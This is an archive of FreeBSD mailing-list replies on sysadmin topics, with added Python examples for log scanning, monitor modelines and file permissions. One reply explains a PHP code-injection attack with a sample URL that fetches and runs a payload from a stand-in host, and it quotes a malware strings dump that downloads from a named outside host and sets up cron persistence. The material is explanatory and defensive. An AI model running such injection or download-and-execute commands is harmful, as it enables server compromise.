Re: questions about FreeBSD

2009-09-01 Thread Jeremy Hooks
2009/8/31 James Phillips anti_spam...@yahoo.ca:
...
 I have some questions about FreeBSD. The questions I had in
 mind are:

 Such general questions imply homework assignment.

Indeed, I found "General features (at least three)? Firewall, GUI,
Networking and so on." quite amusing.  I am surprised he didn't include
the marking scheme for us and his teacher's email address so that we
could save him the bother of handing it in.


 Somebody already replied with a link to the Handbook: It mainly covers 
 installing and configuring FreeBSD.

If that were the only response, he probably would have just printed
the handbook out and handed it in - given the amount of effort he took
to hide the fact that it was a homework question.

That said, he *might* actually learn something about FreeBSD, which is
probably more than can be said for the rest of his class.
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org


Re: what www perl script is running?

2009-08-27 Thread Jeremy Hooks
Hi Colin.

I thought I'd just add my tuppence here.  Some time ago I suffered a
similar exploit, albeit on a Linux box, with Apache and a different
PHP web app (Horde if I recall correctly).

There are a number of ways your server could have been compromised via a
PHP webapp, and a mailing list probably isn't the best place to give
you a tutorial on the likes of cross-site scripting and code injection.
What I can do is tell you roughly how my site was infected via a code
injection - to give you an idea of how important it is to learn more
about it if you are running a webserver (especially one with third
party web apps installed).

In my case, I was able to learn quite a bit about how the exploit was
performed by looking in my Apache logs.  Primarily because the attack
exploited an HTTP GET variable, so I could actually grep the name of
the script that was downloaded from the logs.  Basically all it took was
for someone to construct a URL similar to the following*:

  http://www.myserver.com/vulnerable_script.php?unchecked_variable=some_value;
exec('wget http://evil.url/virus.pl -O /tmp/virus.pl');
exec('/tmp/virus.pl');

All it needs then is a bit of code on the server side which uses the
GET variable verbatim to build a line of code without checking the
variable.  If the above variable were used in the construction of a
line of PHP, in an (extra) unsafe manner, you would end up with
several lines of PHP.  Clearly building code from a user supplied
variable is a very bad idea, and doing so without checking the
variable... - however it isn't unheard of in the world of third
party web apps (it isn't unheard of in in-house web apps either,
however because they are not so widespread there is less chance
that the exploit will be found, and probably less to gain from
exploiting it).

The attack against your server was almost certainly automated and most
likely not even targeted at you.  If you check your error logs, you
will probably see lots of 'file not found' and similar errors, testing
for vulnerabilities in ASP scripts and PHP web apps which you don't
have installed - in much the same way that you will have SSH login
failures for users who don't exist on your system.

Using an incoming and outgoing firewall is clearly a must on a
dedicated web server.  Running an outgoing server on your desktop is
a bit more complicated as you would probably want to allow certain
applications to set up outgoing connections.  I don't know how you
do this on a FreeBSD system.

However something that no one seems to have mentioned yet is running
an application level firewall to protect your web server; this is
particularly important if you are running popular third party web
applications.  Once a flaw has been found in a popular web app, it is
very easy for the malware writers to attempt to exploit this on
thousands of webservers.  A web application firewall, such as
Mod_Security for Apache (not sure what is available for lighttpd),
will check the traffic to your HTTP server for any irregularities,
known exploits and potential exploits.

HTH

Jeremy

* the URL I wrote probably isn't even valid, it is just a
  demonstration, so just treat it as pseudocode.

2009/8/27 Colin Brace c...@lim.nl:


 Colin Brace wrote:

 ah, another directory found in /tmp with files written by www called
 .bash/ Contents here:

 http://silenceisdefeat.com/~cbrace/www_badstuff-3.gz

 Apropos of the contents of the above, a correspondent writes:

 [...]
 running 'strings' on /tmp/owned will show
 HISTFILE=/dev/null
 cd /tmp;curl -s -O http://www.tirnaveni.org/tmpfile 21 /dev/null
 cd /tmp;wget -b http://www.tirnaveni.org/tmpfile 21 /dev/null
 echo '*/1 * * * * perl /tmp/tmpfile' cron.job
 crontab cron.job
 rm -rf cron.job
 chmod 0100 /tmp/tmpfile 21 /dev/null
 perl /tmp/tmpfile 21 /dev/null
 [...]

 So this would be the original mischief-maker.

 Just out of curiosity, can someone explain to me in basic terms how an
 intruder exploits a vulnerability such as apparently existed on my system
 (the RoundCube webmail package was apparently the culprit) to place the
 binary file owned in /tmp and execute it?

 Thanks

 -
  Colin Brace
  Amsterdam
  http://lim.nl


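The log check Jeremy describes (grepping the access log for the injected GET variable, and spotting the automated 404 probing) as an added example; this is not code from the thread, from Apache or from any of the web apps named. The log lines are constructed in Apache combined format, and the client addresses, the `/phpmyadmin` and `/horde` probe paths and the `SUSPECT_RE` fragments are assumptions for the demo.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample in Apache combined log format (not real traffic); the
# second line carries a query shaped like the injected URL described above.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Aug/2009:10:01:12 +0200] "GET /index.php?page=home HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
203.0.113.9 - - [27/Aug/2009:10:02:40 +0200] "GET /vulnerable_script.php?unchecked_variable=some_value%3Bexec(%27wget%20http%3A%2F%2Fevil.url%2Fvirus.pl%20-O%20%2Ftmp%2Fvirus.pl%27)%3B HTTP/1.1" 200 12 "-" "libwww-perl/5.8"
203.0.113.9 - - [27/Aug/2009:10:02:41 +0200] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 210 "-" "libwww-perl/5.8"
203.0.113.9 - - [27/Aug/2009:10:02:42 +0200] "GET /horde/admin/setup.php HTTP/1.1" 404 210 "-" "libwww-perl/5.8"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Fragments an ordinary web app never expects in a query string (shell download
# or execution, PHP eval-style calls). Checked after URL-decoding, because a
# grep on the raw, percent-encoded line would miss them.
SUSPECT_RE = re.compile(r"(wget |curl |exec\(|system\(|passthru\(|shell_exec\(|/tmp/)", re.I)

def parse_line(line):
    """Split one combined-log line into ip, path, decoded query and status."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = unquote_plus(parts.query)
    return rec

def find_injection_attempts(log_text):
    """(ip, script, decoded query) for requests whose query carries shell or
    eval fragments: the 'grep the logs' check from the post, after decoding."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and SUSPECT_RE.search(rec["query"]):
            hits.append((rec["ip"], rec["path"], rec["query"]))
    return hits

def count_probe_404s(log_text):
    """404s per client: bursts of misses against apps you do not run are the
    automated vulnerability scanning the post describes."""
    counts = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return counts
```

Run it over a real access log by replacing SAMPLE_LOG with the file contents; a client that shows up in both results is the pattern Jeremy describes, an automated scanner that found one hit among many misses.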


Re: rsync or even scp questions....

2008-10-13 Thread Jeremy Hooks
 How, may I ask, does this work?

If you search the bash man file you can find this and lots of other useful
constructs: search for 'Parameter Expansion'.  I'm not sure how much of this
relates to other Bourne Shell derivatives, but I don't imagine it would be
difficult to test it out.


Re: Can an Account be Locked out for ssh but allow su?

2008-10-09 Thread Jeremy Hooks
Personally I prefer AllowUsers, as that denies all users except those
specifically allowed.  Deny/AllowGroups are useful too.

2008/10/8 Martin McCormick [EMAIL PROTECTED]

 Henrik Hudson writes:
  Check the sshd_config man page for AllowUsers and DenyUsers directives.

 Many thanks. DenyUsers did the trick.



Re: detecting monitor's sync and refresh rate?

2008-10-08 Thread Jeremy Hooks
I cheated a little and pulled this out of openSUSE 11's monitor database:

#==
# [EMAIL PROTECTED]
#--
-- LCD:[EMAIL PROTECTED]  {
 Option=DPMS
 Hsync=31-60
 Modeline=1024x768 65.0 1024 1048 1184 1344 768 771 777 806 -hsync -vsync
 Vsync=30-60
}

That should be about right for your 15" LCD monitor if it supports
[EMAIL PROTECTED] - quite common for 15" monitors.  You'll notice the modeline
matches the last modeline in your logs.  It might not be optimal, but it
should work if your monitor is VESA compliant.

Another option, if you have the Windows driver disk, would be to extract the
.inf file and get the settings from that.

2008/10/8 Anton Shterenlikht [EMAIL PROTECTED]

 On Tue, Oct 07, 2008 at 04:42:07PM -0400, Lowell Gilbert wrote:
  Anton Shterenlikht [EMAIL PROTECTED] writes:
 
   I've a monitor (Mobi M15MPC) with no docs.
   I've searched the net but cannot find any info on sync and refresh rate
 for it.
   I've done Xorg -configure, but testing with X -config xorg.conf.new
   shows screen shifted to the side and very nasty blinking, from which
   I deduced that perhaps I need to specify correct sync, refresh and
 mode.
  
   Are there any commands to get sync and refresh from the monitor?
 
  If X can't probe the monitor for its settings, I wouldn't trust any
  other method of probing it either.
 
  Not to overlook the obvious: are the settings written on the back of
  the monitor?

 no, nothing there.

 Can I make anything from this fragment of /var/log/Xorg.0.log:

 (II) intel(0): Printing DDC gathered Modelines:
 (II) intel(0): Modeline 1024x768x0.0   65.00  1024 1048 1184 1184  768 771 777 806 -hsync -vsync (54.9 kHz)
 (II) intel(0): Modeline 800x600x0.0   40.00  800 840 968 1056  600 601 605 628 +hsync +vsync (37.9 kHz)
 (II) intel(0): Modeline 640x480x0.0   25.20  640 656 752 800  480 490 492 525 -hsync -vsync (31.5 kHz)
 (II) intel(0): Modeline 720x400x0.0   28.32  720 738 846 900  400 412 414 449 -hsync +vsync (31.5 kHz)
 (II) intel(0): Modeline 1024x768x0.0   65.00  1024 1048 1184 1344  768 771 777 806 -hsync -vsync (48.4 kHz)


  You can always try Google...

 so far no luck

 thanks
 anton

 --
 Anton Shterenlikht
 Room 2.6, Queen's Building
 Mech Eng Dept
 Bristol University
 University Walk, Bristol BS8 1TR, UK
 Tel: +44 (0)117 928 8233
 Fax: +44 (0)117 929 4423

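How to check a Modeline against the Hsync/Vsync ranges before putting it in xorg.conf, as an added example that is not code from the thread or from Xorg. It recomputes the kHz figures the Xorg log prints (pixel clock divided by the horizontal total, then by the vertical total for the refresh rate) from the modelines and sync ranges posted above; the function names are assumptions.

```python
# Sync ranges from the openSUSE monitor entry quoted above.
HSYNC_RANGE_KHZ = (31.0, 60.0)   # Hsync=31-60
VSYNC_RANGE_HZ = (30.0, 60.0)    # Vsync=30-60

def parse_modeline(text):
    """Parse an Xorg Modeline body: 'name clock hdisp hsyncstart hsyncend
    htotal vdisp vsyncstart vsyncend vtotal [flags...]' (clock in MHz)."""
    fields = text.split()
    h = [int(x) for x in fields[2:6]]
    v = [int(x) for x in fields[6:10]]
    return {"name": fields[0], "clock_mhz": float(fields[1]),
            "htotal": h[3], "vtotal": v[3], "flags": fields[10:]}

def sync_rates(modeline):
    """hsync (kHz) = pixel clock / htotal; vsync (Hz) = hsync / vtotal.
    Rounded to one decimal, which is what the Xorg log prints."""
    hsync_khz = modeline["clock_mhz"] * 1000.0 / modeline["htotal"]
    vsync_hz = hsync_khz * 1000.0 / modeline["vtotal"]
    return round(hsync_khz, 1), round(vsync_hz, 1)

def fits_monitor(modeline):
    """True when both rates fall inside the monitor's declared ranges,
    which is the test Xorg applies before it will use a mode."""
    hs, vs = sync_rates(modeline)
    return (HSYNC_RANGE_KHZ[0] <= hs <= HSYNC_RANGE_KHZ[1]
            and VSYNC_RANGE_HZ[0] <= vs <= VSYNC_RANGE_HZ[1])

# The modeline from the openSUSE entry, and the last DDC modeline in the log.
SUGGESTED = parse_modeline(
    "1024x768 65.0 1024 1048 1184 1344 768 771 777 806 -hsync -vsync")
# The first DDC modeline in the log has htotal 1184, hence its 54.9 kHz;
# its refresh rate lands well above the 60 Hz ceiling.
DDC_FIRST = parse_modeline(
    "1024x768x0.0 65.00 1024 1048 1184 1184 768 771 777 806 -hsync -vsync")
DDC_800 = parse_modeline(
    "800x600x0.0 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync")

if __name__ == "__main__":
    for m in (SUGGESTED, DDC_FIRST, DDC_800):
        print(m["name"], sync_rates(m), "ok" if fits_monitor(m) else "out of range")
```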


Re: thorny (for me) permissions problem

2008-10-07 Thread Jeremy Hooks
 4. however, after upload, the file has the ownership A:B (i.e., owned by
A, group B) with permissions -rw-r--r--. So B does not have permission to
delete the file.
   -rw-r--r-- 1 user_a user_b 154879 Oct 7 08:40 data_file.csv

Hi John.

Correct me if I am wrong but permission to delete a file depends on the
user's permissions for the containing directory.  If B has write permission
on the directory then B can delete the file.  However, you will likely need
to use 'rm -f'.

Regards.

Jeremy.

On Tue, Oct 7, 2008 at 1:54 PM, John Almberg [EMAIL PROTECTED] wrote:

 The following permissions problem has me stumped:

 1. User A uploads a file (using ftp) to the server, into a directory called
 'data' owned by user B. Permissions on directory set to allow this, like
 this:
drwxrwxr-x  2 user_b user_b   512 Oct  7 08:40 data

 2. A cron job, run by user B, then processes the file

 3. When the processing is complete, the cron job needs to delete the file
 from the server

 4. however, after upload, the file has the ownership A:B (i.e., owned by A,
 group B) with permissions -rw-r--r--. So B does not have permission to
 delete the file.
-rw-r--r-- 1 user_a user_b 154879 Oct 7 08:40 data_file.csv

 The ftp user can manually change the permissions on the file to -rw-rw-r--,
 but I do not want to depend on the user remembering to change permissions.
 If he forgets, the cronjob will process the file over and over again. I need
 the server to handle this, so it gets done correctly 100% of the time.

 B does not have sufficient permissions to delete the file or change its
 permissions. The only thing I can think of is to have ANOTHER cron job, run
 by A, run every few minutes to check for the existence of a file, and change
 the permissions so B can delete it. But this smells like a kludge to me.

 Is there a correct way to handle this? For instance, is there something I
 can set in A's profile, so when he uploads a file, the group permission is
 set to rw? That would be a nice clean way to do it, but I can't find
 anything like that.

 Any help, much appreciated.

 -- John


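A way to confirm Jeremy's point before relying on it in the cron job, as an added example that is not code from the thread: unlink(2) is decided by the write bit on the directory, not by the mode of the file. The demo runs as a single user in a scratch directory (the real case has different owners, but the kernel check is the same); `can_unlink` and `running_as_root` are names chosen here.

```python
import os
import tempfile

def can_unlink(dir_mode, file_mode):
    """Create data/data_file.csv in a scratch directory, apply the modes, and
    report whether unlink(2) succeeds. Constructed demo: removing a name needs
    write (and search) permission on the directory; the file's mode is not
    consulted, which is why B can remove A's -rw-r--r-- file from a directory
    that is group-writable for B."""
    with tempfile.TemporaryDirectory() as scratch:
        data = os.path.join(scratch, "data")
        os.mkdir(data)
        path = os.path.join(data, "data_file.csv")
        open(path, "w").close()
        os.chmod(path, file_mode)   # e.g. 0o644, as left by the ftp upload
        os.chmod(data, dir_mode)    # e.g. 0o775, as on the 'data' directory
        try:
            os.unlink(path)
            return True
        except PermissionError:
            return False
        finally:
            os.chmod(data, 0o755)   # let TemporaryDirectory clean up

def running_as_root():
    """root bypasses the directory check, so the negative case only holds
    for an unprivileged user."""
    return os.geteuid() == 0

if __name__ == "__main__":
    # rm(1) asks before removing a non-writable file only because it looks at
    # the file mode itself; the kernel does not, hence 'rm -f' in the cron job.
    print("writable dir, read-only file:", can_unlink(0o775, 0o444))
    print("read-only dir, writable file:", can_unlink(0o555, 0o664))
```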